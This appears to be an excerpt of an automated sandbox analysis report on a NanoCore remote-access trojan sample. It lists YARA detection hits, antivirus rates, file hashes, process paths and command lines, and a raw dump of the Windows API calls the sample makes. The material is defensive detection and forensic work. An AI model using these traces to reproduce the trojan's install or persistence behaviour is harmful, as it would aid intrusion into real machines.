                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.309024218.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000001.00000002.309024218.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: NanoCore, Description: unknown, Source: 00000001.00000002.309024218.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000001.00000002.309024218.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                  Antivirus matches:
                  • Detection: 65%, ReversingLabs
                  • Detection: 52%, Virustotal, Browse
                  Reputation: low

                  Target ID: 2
                  Start time: 23:17:06
                  Start date: 03/02/2023
                  Path: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe
                  Wow64 process (32bit): true
                  Commandline: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe
                  Imagebase: 0x280000
                  File size: 82432 bytes
                  MD5 hash: 64F982758878F6A97ED4B3D99CFBD371
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: .Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.564994074.0000000001587000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.564994074.0000000001587000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.564994074.0000000001587000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.564994074.0000000001587000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.571891406.0000000007620000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.571891406.0000000007620000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.571891406.0000000007620000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.571891406.0000000007620000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.571954055.0000000007660000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.571954055.0000000007660000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.571954055.0000000007660000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.571954055.0000000007660000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.317149940.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.571812469.00000000075F0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.571812469.00000000075F0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.571812469.00000000075F0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.571812469.00000000075F0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.570983718.0000000005DF0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.570983718.0000000005DF0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.570983718.0000000005DF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.570983718.0000000005DF0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.570983718.0000000005DF0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.571761394.00000000075C0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.571761394.00000000075C0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.571761394.00000000075C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.571761394.00000000075C0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.571720723.0000000007590000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.571720723.0000000007590000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.571720723.0000000007590000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.571720723.0000000007590000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.567185811.00000000043A5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.571671329.0000000007570000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.571671329.0000000007570000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.571671329.0000000007570000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.571671329.0000000007570000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.567185811.0000000004404000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.567185811.0000000004404000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.571793197.00000000075E0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.571793197.00000000075E0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.571793197.00000000075E0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.571793197.00000000075E0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.571026013.0000000005E10000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.571026013.0000000005E10000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.571026013.0000000005E10000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.571026013.0000000005E10000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.571773496.00000000075D0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.571773496.00000000075D0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.571773496.00000000075D0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.571773496.00000000075D0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.571597397.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.571597397.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.571597397.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.571597397.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.565935661.0000000003332000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.565935661.0000000003332000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.565935661.0000000003332000.00000040.00001000.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.565935661.0000000003332000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.571745163.00000000075B0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.571745163.00000000075B0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.571745163.00000000075B0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.571745163.00000000075B0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.566066458.0000000003381000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.571864347.0000000007610000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.571864347.0000000007610000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.571864347.0000000007610000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.571864347.0000000007610000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.570873526.0000000005BB0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.570873526.0000000005BB0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.570873526.0000000005BB0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.570873526.0000000005BB0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.567185811.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.567185811.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:low

                  Target ID:3
                  Start time:23:17:19
                  Start date:03/02/2023
                  Path:C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exe" "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Loca
                  Imagebase:0x1d0000
                  File size:82432 bytes
                  MD5 hash:64F982758878F6A97ED4B3D99CFBD371
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Antivirus matches:
                  • Detection: 65%, ReversingLabs
                  • Detection: 52%, Virustotal, Browse
                  Reputation:low

                  Target ID:6
                  Start time:23:17:23
                  Start date:03/02/2023
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 656
                  Imagebase:0x980000
                  File size:434592 bytes
                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:7
                  Start time:23:17:29
                  Start date:03/02/2023
                  Path:C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exe" "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Loca
                  Imagebase:0x1d0000
                  File size:82432 bytes
                  MD5 hash:64F982758878F6A97ED4B3D99CFBD371
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:low

                  Target ID:9
                  Start time:23:17:30
                  Start date:03/02/2023
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5104 -s 632
                  Imagebase:0x980000
                  File size:434592 bytes
                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high


                    Execution Graph

                    Execution Coverage:15.9%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:16.4%
                    Total number of Nodes:1385
                    Total number of Limit Nodes:25
17 API calls 4127->4128 4129 40196f 4128->4129 4130 402d84 17 API calls 4129->4130 4131 40197c 4130->4131 4132 402da6 17 API calls 4131->4132 4133 401993 lstrlenW 4132->4133 4135 4019a4 4133->4135 4134 4019e5 4135->4134 4139 406668 lstrcpynW 4135->4139 4137 4019d5 4137->4134 4138 4019da lstrlenW 4137->4138 4138->4134 4139->4137 4147 40166a 4148 402da6 17 API calls 4147->4148 4149 401670 4148->4149 4150 40699e 2 API calls 4149->4150 4151 401676 4150->4151 4152 402aeb 4153 402d84 17 API calls 4152->4153 4154 402af1 4153->4154 4155 4066a5 17 API calls 4154->4155 4156 40292e 4154->4156 4155->4156 4157 4026ec 4158 402d84 17 API calls 4157->4158 4159 4026fb 4158->4159 4160 402745 ReadFile 4159->4160 4161 4061db ReadFile 4159->4161 4163 402785 MultiByteToWideChar 4159->4163 4164 40283a 4159->4164 4166 4027ab SetFilePointer MultiByteToWideChar 4159->4166 4167 40284b 4159->4167 4169 402838 4159->4169 4170 406239 SetFilePointer 4159->4170 4160->4159 4160->4169 4161->4159 4163->4159 4179 4065af wsprintfW 4164->4179 4166->4159 4168 40286c SetFilePointer 4167->4168 4167->4169 4168->4169 4171 406255 4170->4171 4174 40626d 4170->4174 4172 4061db ReadFile 4171->4172 4173 406261 4172->4173 4173->4174 4175 406276 SetFilePointer 4173->4175 4176 40629e SetFilePointer 4173->4176 4174->4159 4175->4176 4177 406281 4175->4177 4176->4174 4178 40620a WriteFile 4177->4178 4178->4174 4179->4169 4180 404a6e 4181 404aa4 4180->4181 4182 404a7e 4180->4182 4184 40462b 8 API calls 4181->4184 4183 4045c4 18 API calls 4182->4183 4185 404a8b SetDlgItemTextW 4183->4185 4186 404ab0 4184->4186 4185->4181 3894 40176f 3895 402da6 17 API calls 3894->3895 3896 401776 3895->3896 3897 401796 3896->3897 3898 40179e 3896->3898 3933 406668 lstrcpynW 3897->3933 3934 406668 lstrcpynW 3898->3934 3901 40179c 3905 4068ef 5 API calls 3901->3905 3902 4017a9 3903 405f37 3 API calls 3902->3903 3904 4017af lstrcatW 3903->3904 3904->3901 3925 4017bb 3905->3925 3906 40699e 2 API calls 3906->3925 3907 406133 2 API calls 
3907->3925 3909 4017cd CompareFileTime 3909->3925 3910 40188d 3912 4056ca 24 API calls 3910->3912 3911 401864 3913 4056ca 24 API calls 3911->3913 3921 401879 3911->3921 3914 401897 3912->3914 3913->3921 3915 403371 44 API calls 3914->3915 3916 4018aa 3915->3916 3917 4018be SetFileTime 3916->3917 3918 4018d0 FindCloseChangeNotification 3916->3918 3917->3918 3920 4018e1 3918->3920 3918->3921 3919 4066a5 17 API calls 3919->3925 3923 4018e6 3920->3923 3924 4018f9 3920->3924 3922 406668 lstrcpynW 3922->3925 3926 4066a5 17 API calls 3923->3926 3927 4066a5 17 API calls 3924->3927 3925->3906 3925->3907 3925->3909 3925->3910 3925->3911 3925->3919 3925->3922 3928 405cc8 MessageBoxIndirectW 3925->3928 3932 406158 GetFileAttributesW CreateFileW 3925->3932 3929 4018ee lstrcatW 3926->3929 3930 401901 3927->3930 3928->3925 3929->3930 3931 405cc8 MessageBoxIndirectW 3930->3931 3931->3921 3932->3925 3933->3901 3934->3902 4187 401a72 4188 402d84 17 API calls 4187->4188 4189 401a7b 4188->4189 4190 402d84 17 API calls 4189->4190 4191 401a20 4190->4191 4192 401573 4193 401583 ShowWindow 4192->4193 4194 40158c 4192->4194 4193->4194 4195 402c2a 4194->4195 4196 40159a ShowWindow 4194->4196 4196->4195 4197 4023f4 4198 402da6 17 API calls 4197->4198 4199 402403 4198->4199 4200 402da6 17 API calls 4199->4200 4201 40240c 4200->4201 4202 402da6 17 API calls 4201->4202 4203 402416 GetPrivateProfileStringW 4202->4203 4204 4014f5 SetForegroundWindow 4205 402c2a 4204->4205 4206 401ff6 4207 402da6 17 API calls 4206->4207 4208 401ffd 4207->4208 4209 40699e 2 API calls 4208->4209 4210 402003 4209->4210 4212 402014 4210->4212 4213 4065af wsprintfW 4210->4213 4213->4212 4214 401b77 4215 402da6 17 API calls 4214->4215 4216 401b7e 4215->4216 4217 402d84 17 API calls 4216->4217 4218 401b87 wsprintfW 4217->4218 4219 402c2a 4218->4219 4220 4046fa lstrcpynW lstrlenW 4221 40167b 4222 402da6 17 API calls 4221->4222 4223 401682 4222->4223 4224 402da6 17 API calls 4223->4224 4225 40168b 4224->4225 4226 402da6 17 
API calls 4225->4226 4227 401694 MoveFileW 4226->4227 4228 4016a0 4227->4228 4229 4016a7 4227->4229 4231 401423 24 API calls 4228->4231 4230 40699e 2 API calls 4229->4230 4233 4022f6 4229->4233 4232 4016b6 4230->4232 4231->4233 4232->4233 4234 406428 36 API calls 4232->4234 4234->4228 4242 4019ff 4243 402da6 17 API calls 4242->4243 4244 401a06 4243->4244 4245 402da6 17 API calls 4244->4245 4246 401a0f 4245->4246 4247 401a16 lstrcmpiW 4246->4247 4248 401a28 lstrcmpW 4246->4248 4249 401a1c 4247->4249 4248->4249 4250 4022ff 4251 402da6 17 API calls 4250->4251 4252 402305 4251->4252 4253 402da6 17 API calls 4252->4253 4254 40230e 4253->4254 4255 402da6 17 API calls 4254->4255 4256 402317 4255->4256 4257 40699e 2 API calls 4256->4257 4258 402320 4257->4258 4259 402331 lstrlenW lstrlenW 4258->4259 4260 402324 4258->4260 4262 4056ca 24 API calls 4259->4262 4261 4056ca 24 API calls 4260->4261 4264 40232c 4260->4264 4261->4264 4263 40236f SHFileOperationW 4262->4263 4263->4260 4263->4264 4265 401000 4266 401037 BeginPaint GetClientRect 4265->4266 4267 40100c DefWindowProcW 4265->4267 4269 4010f3 4266->4269 4270 401179 4267->4270 4271 401073 CreateBrushIndirect FillRect DeleteObject 4269->4271 4272 4010fc 4269->4272 4271->4269 4273 401102 CreateFontIndirectW 4272->4273 4274 401167 EndPaint 4272->4274 4273->4274 4275 401112 6 API calls 4273->4275 4274->4270 4275->4274 4276 401d81 4277 401d94 GetDlgItem 4276->4277 4278 401d87 4276->4278 4280 401d8e 4277->4280 4279 402d84 17 API calls 4278->4279 4279->4280 4281 401dd5 GetClientRect LoadImageW SendMessageW 4280->4281 4283 402da6 17 API calls 4280->4283 4284 401e33 4281->4284 4286 401e3f 4281->4286 4283->4281 4285 401e38 DeleteObject 4284->4285 4284->4286 4285->4286 4287 401503 4288 40150b 4287->4288 4290 40151e 4287->4290 4289 402d84 17 API calls 4288->4289 4289->4290 4291 404783 4292 40479b 4291->4292 4296 4048b5 4291->4296 4297 4045c4 18 API calls 4292->4297 4293 40491f 4294 4049e9 4293->4294 4295 404929 GetDlgItem 4293->4295 
4302 40462b 8 API calls 4294->4302 4298 404943 4295->4298 4299 4049aa 4295->4299 4296->4293 4296->4294 4300 4048f0 GetDlgItem SendMessageW 4296->4300 4301 404802 4297->4301 4298->4299 4307 404969 SendMessageW LoadCursorW SetCursor 4298->4307 4299->4294 4303 4049bc 4299->4303 4324 4045e6 EnableWindow 4300->4324 4305 4045c4 18 API calls 4301->4305 4306 4049e4 4302->4306 4308 4049d2 4303->4308 4309 4049c2 SendMessageW 4303->4309 4311 40480f CheckDlgButton 4305->4311 4328 404a32 4307->4328 4308->4306 4314 4049d8 SendMessageW 4308->4314 4309->4308 4310 40491a 4325 404a0e 4310->4325 4322 4045e6 EnableWindow 4311->4322 4314->4306 4317 40482d GetDlgItem 4323 4045f9 SendMessageW 4317->4323 4319 404843 SendMessageW 4320 404860 GetSysColor 4319->4320 4321 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4319->4321 4320->4321 4321->4306 4322->4317 4323->4319 4324->4310 4326 404a21 SendMessageW 4325->4326 4327 404a1c 4325->4327 4326->4293 4327->4326 4331 405c8e ShellExecuteExW 4328->4331 4330 404998 LoadCursorW SetCursor 4330->4299 4331->4330 4332 402383 4333 40238a 4332->4333 4336 40239d 4332->4336 4334 4066a5 17 API calls 4333->4334 4335 402397 4334->4335 4337 405cc8 MessageBoxIndirectW 4335->4337 4337->4336 4338 402c05 SendMessageW 4339 402c2a 4338->4339 4340 402c1f InvalidateRect 4338->4340 4340->4339 4341 405809 4342 4059b3 4341->4342 4343 40582a GetDlgItem GetDlgItem GetDlgItem 4341->4343 4345 4059e4 4342->4345 